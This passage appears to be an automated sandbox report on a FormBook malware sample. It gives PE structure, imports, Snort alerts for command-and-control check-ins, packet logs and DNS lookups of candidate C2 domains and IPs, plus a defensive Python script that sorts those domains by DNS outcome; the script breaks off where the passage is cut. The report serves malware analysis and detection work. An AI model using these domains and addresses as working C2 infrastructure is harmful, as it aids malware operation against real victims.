                                                                      mov byte ptr [ebp-00000278h], FFFFFFC1h
                                                                      mov byte ptr [ebp-00000277h], FFFFFFE1h
                                                                      mov byte ptr [ebp-00000276h], 00000007h
                                                                      mov byte ptr [ebp+00000000h], 00000000h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [LNK] VS2008 SP1 build 30729

                                                                      Data Directories

                                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3090 | 0x8c | .rdata
                                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x90 | .rdata
                                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                      Sections

                                                                       Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                       .text | 0x1000 | 0x1142 | 0x1200 | False | 0.485677083333 | data | 4.74207504229 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                       .rdata | 0x3000 | 0x3fc | 0x400 | False | 0.5732421875 | data | 4.71317659598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Imports

                                                                       DLL | Import
                                                                       USER32.dll | GrayStringA, GetDC
                                                                       GDI32.dll | GetWorldTransform, GetTextMetricsW, SelectObject, AddFontResourceExA, GdiArtificialDecrementDriver, SetBoundsRect, CreateCompatibleDC
                                                                       SHLWAPI.dll | StrNCatW, SHRegOpenUSKeyW, UrlUnescapeA, PathFindExtensionW, UrlEscapeW, PathCombineW, PathIsSystemFolderA, StrCmpW
                                                                       WINSPOOL.DRV | GetPrinterDataExW, ConnectToPrinterDlg, DevQueryPrint, ConfigurePortA, DeviceCapabilitiesA, DeletePrinterDriverA
                                                                       MSVFW32.dll | DrawDibBegin, MCIWndCreate, ICClose
                                                                       AVIFIL32.dll | AVIMakeStreamFromClipboard, AVIStreamOpenFromFileA

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                       Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                       07/22/21-18:05:29.842456 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.5 | 34.102.136.180
                                                                       07/22/21-18:05:29.842456 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.5 | 34.102.136.180
                                                                       07/22/21-18:05:29.842456 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.5 | 34.102.136.180
                                                                       07/22/21-18:05:29.980778 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49735 | 34.102.136.180 | 192.168.2.5
                                                                       07/22/21-18:05:40.590605 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.5
                                                                       07/22/21-18:05:45.704566 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.5 | 172.104.157.41
                                                                       07/22/21-18:05:45.704566 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.5 | 172.104.157.41
                                                                       07/22/21-18:05:45.704566 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.5 | 172.104.157.41
                                                                       07/22/21-18:05:51.027598 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49740 | 75.2.81.221 | 192.168.2.5
                                                                       07/22/21-18:06:08.622399 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.5 | 34.102.136.180
                                                                       07/22/21-18:06:08.622399 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.5 | 34.102.136.180
                                                                       07/22/21-18:06:08.622399 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.5 | 34.102.136.180
                                                                       07/22/21-18:06:08.765433 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49743 | 34.102.136.180 | 192.168.2.5
                                                                       07/22/21-18:06:29.722039 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.5 | 209.99.40.222
                                                                       07/22/21-18:06:29.722039 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.5 | 209.99.40.222
                                                                       07/22/21-18:06:29.722039 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49745 | 80 | 192.168.2.5 | 209.99.40.222

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 18:05:24.420397043 CEST | 49734 | 80 | 192.168.2.5 | 95.215.210.10
Jul 22, 2021 18:05:24.558319092 CEST | 80 | 49734 | 95.215.210.10 | 192.168.2.5
Jul 22, 2021 18:05:24.565618992 CEST | 49734 | 80 | 192.168.2.5 | 95.215.210.10
Jul 22, 2021 18:05:24.568625927 CEST | 49734 | 80 | 192.168.2.5 | 95.215.210.10
Jul 22, 2021 18:05:24.706835985 CEST | 80 | 49734 | 95.215.210.10 | 192.168.2.5
Jul 22, 2021 18:05:24.706911087 CEST | 80 | 49734 | 95.215.210.10 | 192.168.2.5
Jul 22, 2021 18:05:24.707521915 CEST | 80 | 49734 | 95.215.210.10 | 192.168.2.5
Jul 22, 2021 18:05:24.709042072 CEST | 49734 | 80 | 192.168.2.5 | 95.215.210.10
Jul 22, 2021 18:05:24.709491968 CEST | 49734 | 80 | 192.168.2.5 | 95.215.210.10
Jul 22, 2021 18:05:24.858376026 CEST | 80 | 49734 | 95.215.210.10 | 192.168.2.5
Jul 22, 2021 18:05:29.799993992 CEST | 49735 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:29.842174053 CEST | 80 | 49735 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:29.842305899 CEST | 49735 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:29.842456102 CEST | 49735 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:29.884633064 CEST | 80 | 49735 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:29.980777979 CEST | 80 | 49735 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:29.980814934 CEST | 80 | 49735 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:29.980947971 CEST | 49735 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:29.981005907 CEST | 49735 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:30.282537937 CEST | 49735 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:30.325236082 CEST | 80 | 49735 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:40.409492016 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:40.451663971 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:40.452857018 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:40.453010082 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:40.494915009 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:40.590605021 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:40.590624094 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:40.590764999 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:40.590826035 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:40.892844915 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:05:40.934571981 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:05:45.662502050 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.704116106 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.704224110 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.704566002 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.746088982 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750137091 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750384092 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750467062 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.750477076 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750710964 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750773907 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.750792980 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750893116 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.750974894 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.751004934 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.751007080 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.751020908 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.751085997 CEST | 80 | 49739 | 172.104.157.41 | 192.168.2.5
Jul 22, 2021 18:05:45.751219988 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.751271963 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:45.751358986 CEST | 49739 | 80 | 192.168.2.5 | 172.104.157.41
Jul 22, 2021 18:05:50.830846071 CEST | 49740 | 80 | 192.168.2.5 | 75.2.81.221
Jul 22, 2021 18:05:50.873204947 CEST | 80 | 49740 | 75.2.81.221 | 192.168.2.5
Jul 22, 2021 18:05:50.873344898 CEST | 49740 | 80 | 192.168.2.5 | 75.2.81.221
Jul 22, 2021 18:05:50.873647928 CEST | 49740 | 80 | 192.168.2.5 | 75.2.81.221
Jul 22, 2021 18:05:50.915102959 CEST | 80 | 49740 | 75.2.81.221 | 192.168.2.5
Jul 22, 2021 18:05:51.027597904 CEST | 80 | 49740 | 75.2.81.221 | 192.168.2.5
Jul 22, 2021 18:05:51.027626991 CEST | 80 | 49740 | 75.2.81.221 | 192.168.2.5
Jul 22, 2021 18:05:51.027852058 CEST | 49740 | 80 | 192.168.2.5 | 75.2.81.221
Jul 22, 2021 18:05:51.027976990 CEST | 49740 | 80 | 192.168.2.5 | 75.2.81.221
Jul 22, 2021 18:05:51.054819107 CEST | 80 | 49740 | 75.2.81.221 | 192.168.2.5
Jul 22, 2021 18:05:51.054953098 CEST | 49740 | 80 | 192.168.2.5 | 75.2.81.221
Jul 22, 2021 18:05:51.069421053 CEST | 80 | 49740 | 75.2.81.221 | 192.168.2.5
Jul 22, 2021 18:06:01.784503937 CEST | 49741 | 80 | 192.168.2.5 | 154.88.31.204
Jul 22, 2021 18:06:02.012566090 CEST | 80 | 49741 | 154.88.31.204 | 192.168.2.5
Jul 22, 2021 18:06:02.519721985 CEST | 49741 | 80 | 192.168.2.5 | 154.88.31.204
Jul 22, 2021 18:06:02.755395889 CEST | 80 | 49741 | 154.88.31.204 | 192.168.2.5
Jul 22, 2021 18:06:03.269886017 CEST | 49741 | 80 | 192.168.2.5 | 154.88.31.204
Jul 22, 2021 18:06:03.498265982 CEST | 80 | 49741 | 154.88.31.204 | 192.168.2.5
Jul 22, 2021 18:06:07.655210018 CEST | 49742 | 80 | 192.168.2.5 | 154.88.31.204
Jul 22, 2021 18:06:07.886217117 CEST | 80 | 49742 | 154.88.31.204 | 192.168.2.5
Jul 22, 2021 18:06:08.395172119 CEST | 49742 | 80 | 192.168.2.5 | 154.88.31.204
Jul 22, 2021 18:06:08.579940081 CEST | 49743 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:06:08.622020006 CEST | 80 | 49743 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:06:08.622199059 CEST | 49743 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:06:08.622399092 CEST | 49743 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:06:08.627537012 CEST | 80 | 49742 | 154.88.31.204 | 192.168.2.5
Jul 22, 2021 18:06:08.664433956 CEST | 80 | 49743 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:06:08.765433073 CEST | 80 | 49743 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:06:08.765459061 CEST | 80 | 49743 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:06:08.769030094 CEST | 49743 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:06:08.769263983 CEST | 49743 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:06:09.082741976 CEST | 49743 | 80 | 192.168.2.5 | 34.102.136.180
Jul 22, 2021 18:06:09.124838114 CEST | 80 | 49743 | 34.102.136.180 | 192.168.2.5
Jul 22, 2021 18:06:09.129683971 CEST | 49742 | 80 | 192.168.2.5 | 154.88.31.204
Jul 22, 2021 18:06:09.360474110 CEST | 80 | 49742 | 154.88.31.204 | 192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 18:04:09.703279972 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:09.756174088 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:10.560837984 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:10.613598108 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:11.544034004 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:11.593672037 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:12.843043089 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:12.892234087 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:13.708331108 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:13.757579088 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:14.976648092 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:15.026065111 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:15.870773077 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:15.922878027 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:17.254570961 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:17.313491106 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:18.460608006 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:18.517884016 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:29.469683886 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:29.536891937 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:04:38.770940065 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:04:38.833014965 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:02.792947054 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:02.842144966 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:03.003333092 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:03.063633919 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:03.668939114 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:03.729618073 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:05.237622023 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:05.305864096 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:16.708476067 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:16.844685078 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:24.348808050 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:24.412262917 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:29.725193024 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:29.798022032 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:34.991868019 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:35.301244020 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:40.347507000 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:40.408329010 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:43.520809889 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:43.588076115 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:44.008579969 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:44.068742037 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:45.601917028 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:45.660773993 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:50.758366108 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:50.829539061 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:05:56.063550949 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:05:56.557075024 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:06:01.572627068 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:06:01.782565117 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:06:07.533250093 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:06:07.590384960 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:06:08.508938074 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:06:08.576487064 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:06:18.814857960 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:06:18.888294935 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:06:23.903868914 CEST | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:06:23.966645956 CEST | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Jul 22, 2021 18:06:29.368000984 CEST | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Jul 22, 2021 18:06:29.558474064 CEST | 53 | 56432 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 18:05:24.348808050 CEST | 192.168.2.5 | 8.8.8.8 | 0xc49e | Standard query (0) | www.cochez.club | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:29.725193024 CEST | 192.168.2.5 | 8.8.8.8 | 0x4939 | Standard query (0) | www.cindywillardrealtor.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:34.991868019 CEST | 192.168.2.5 | 8.8.8.8 | 0x7e9d | Standard query (0) | www.boatrace-life04.net | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:40.347507000 CEST | 192.168.2.5 | 8.8.8.8 | 0xbdd4 | Standard query (0) | www.wideawakemomma.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:45.601917028 CEST | 192.168.2.5 | 8.8.8.8 | 0x1e19 | Standard query (0) | www.vermogenswerte.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:50.758366108 CEST | 192.168.2.5 | 8.8.8.8 | 0x7c2b | Standard query (0) | www.thenorthgoldline.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:56.063550949 CEST | 192.168.2.5 | 8.8.8.8 | 0x8ab6 | Standard query (0) | www.saludflv.info | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:01.572627068 CEST | 192.168.2.5 | 8.8.8.8 | 0x76bc | Standard query (0) | www.aizaibali.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:07.533250093 CEST | 192.168.2.5 | 8.8.8.8 | 0x58f6 | Standard query (0) | www.aizaibali.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:08.508938074 CEST | 192.168.2.5 | 8.8.8.8 | 0xa77e | Standard query (0) | www.extinctionbrews.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:18.814857960 CEST | 192.168.2.5 | 8.8.8.8 | 0x9265 | Standard query (0) | www.livegaming.store | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:23.903868914 CEST | 192.168.2.5 | 8.8.8.8 | 0xb162 | Standard query (0) | www.melodezu.com | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:29.368000984 CEST | 192.168.2.5 | 8.8.8.8 | 0xdcf1 | Standard query (0) | www.garimpeirastore.online | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 18:05:24.412262917 CEST | 8.8.8.8 | 192.168.2.5 | 0xc49e | No error (0) | www.cochez.club | cochez.club | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:05:24.412262917 CEST | 8.8.8.8 | 192.168.2.5 | 0xc49e | No error (0) | cochez.club | - | 95.215.210.10 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:29.798022032 CEST | 8.8.8.8 | 192.168.2.5 | 0x4939 | No error (0) | www.cindywillardrealtor.com | cindywillardrealtor.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:05:29.798022032 CEST | 8.8.8.8 | 192.168.2.5 | 0x4939 | No error (0) | cindywillardrealtor.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:35.301244020 CEST | 8.8.8.8 | 192.168.2.5 | 0x7e9d | Name error (3) | www.boatrace-life04.net | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:40.408329010 CEST | 8.8.8.8 | 192.168.2.5 | 0xbdd4 | No error (0) | www.wideawakemomma.com | wideawakemomma.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:05:40.408329010 CEST | 8.8.8.8 | 192.168.2.5 | 0xbdd4 | No error (0) | wideawakemomma.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:45.660773993 CEST | 8.8.8.8 | 192.168.2.5 | 0x1e19 | No error (0) | www.vermogenswerte.com | vermogenswerte.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:05:45.660773993 CEST | 8.8.8.8 | 192.168.2.5 | 0x1e19 | No error (0) | vermogenswerte.com | - | 172.104.157.41 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:50.829539061 CEST | 8.8.8.8 | 192.168.2.5 | 0x7c2b | No error (0) | www.thenorthgoldline.com | 825610.parkingcrew.net | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:05:50.829539061 CEST | 8.8.8.8 | 192.168.2.5 | 0x7c2b | No error (0) | 825610.parkingcrew.net | - | 75.2.81.221 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:05:56.557075024 CEST | 8.8.8.8 | 192.168.2.5 | 0x8ab6 | Server failure (2) | www.saludflv.info | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:01.782565117 CEST | 8.8.8.8 | 192.168.2.5 | 0x76bc | No error (0) | www.aizaibali.com | - | 154.88.31.204 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:07.590384960 CEST | 8.8.8.8 | 192.168.2.5 | 0x58f6 | No error (0) | www.aizaibali.com | - | 154.88.31.204 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:08.576487064 CEST | 8.8.8.8 | 192.168.2.5 | 0xa77e | No error (0) | www.extinctionbrews.com | extinctionbrews.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:06:08.576487064 CEST | 8.8.8.8 | 192.168.2.5 | 0xa77e | No error (0) | extinctionbrews.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:18.888294935 CEST | 8.8.8.8 | 192.168.2.5 | 0x9265 | Name error (3) | www.livegaming.store | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:23.966645956 CEST | 8.8.8.8 | 192.168.2.5 | 0xb162 | No error (0) | www.melodezu.com | melodezu.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 18:06:23.966645956 CEST | 8.8.8.8 | 192.168.2.5 | 0xb162 | No error (0) | melodezu.com | - | 64.227.87.162 | A (IP address) | IN (0x0001)
Jul 22, 2021 18:06:29.558474064 CEST | 8.8.8.8 | 192.168.2.5 | 0xdcf1 | No error (0) | www.garimpeirastore.online | - | 209.99.40.222 | A (IP address) | IN (0x0001)
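
FormBook configurations carry a list of candidate domains and the sample walks through them one after another; the DNS answers above are the first place to sort that list. The script below is an added example and is not code from the sandbox or from this report. It transcribes the answer records from the table above (a constructed copy of that data, not a live lookup), follows each CNAME chain to its A record, and separates the queried names into ones that did not resolve (NXDOMAIN or SERVFAIL), ones that land on a domain-parking provider, ones that share one address with other candidates, and ones with an address of their own. The parking suffix list is an assumption for illustration; only parkingcrew.net actually appears in this capture.

```python
"""Sort a FormBook candidate-domain list using the sandbox DNS answers.

Added example, not code from the sandbox or the report. DNS_ANSWERS is a
constructed transcription of the DNS Answers table on this page.
"""
from collections import defaultdict

# (reply code, record name, record type, record data).
# Reply code 0 = No error, 2 = Server failure, 3 = Name error (NXDOMAIN);
# failed lookups have no record type or data.
DNS_ANSWERS = [
    (0, "www.cochez.club", "CNAME", "cochez.club"),
    (0, "cochez.club", "A", "95.215.210.10"),
    (0, "www.cindywillardrealtor.com", "CNAME", "cindywillardrealtor.com"),
    (0, "cindywillardrealtor.com", "A", "34.102.136.180"),
    (3, "www.boatrace-life04.net", None, None),
    (0, "www.wideawakemomma.com", "CNAME", "wideawakemomma.com"),
    (0, "wideawakemomma.com", "A", "34.102.136.180"),
    (0, "www.vermogenswerte.com", "CNAME", "vermogenswerte.com"),
    (0, "vermogenswerte.com", "A", "172.104.157.41"),
    (0, "www.thenorthgoldline.com", "CNAME", "825610.parkingcrew.net"),
    (0, "825610.parkingcrew.net", "A", "75.2.81.221"),
    (2, "www.saludflv.info", None, None),
    (0, "www.aizaibali.com", "A", "154.88.31.204"),
    (0, "www.extinctionbrews.com", "CNAME", "extinctionbrews.com"),
    (0, "extinctionbrews.com", "A", "34.102.136.180"),
    (3, "www.livegaming.store", None, None),
    (0, "www.melodezu.com", "CNAME", "melodezu.com"),
    (0, "melodezu.com", "A", "64.227.87.162"),
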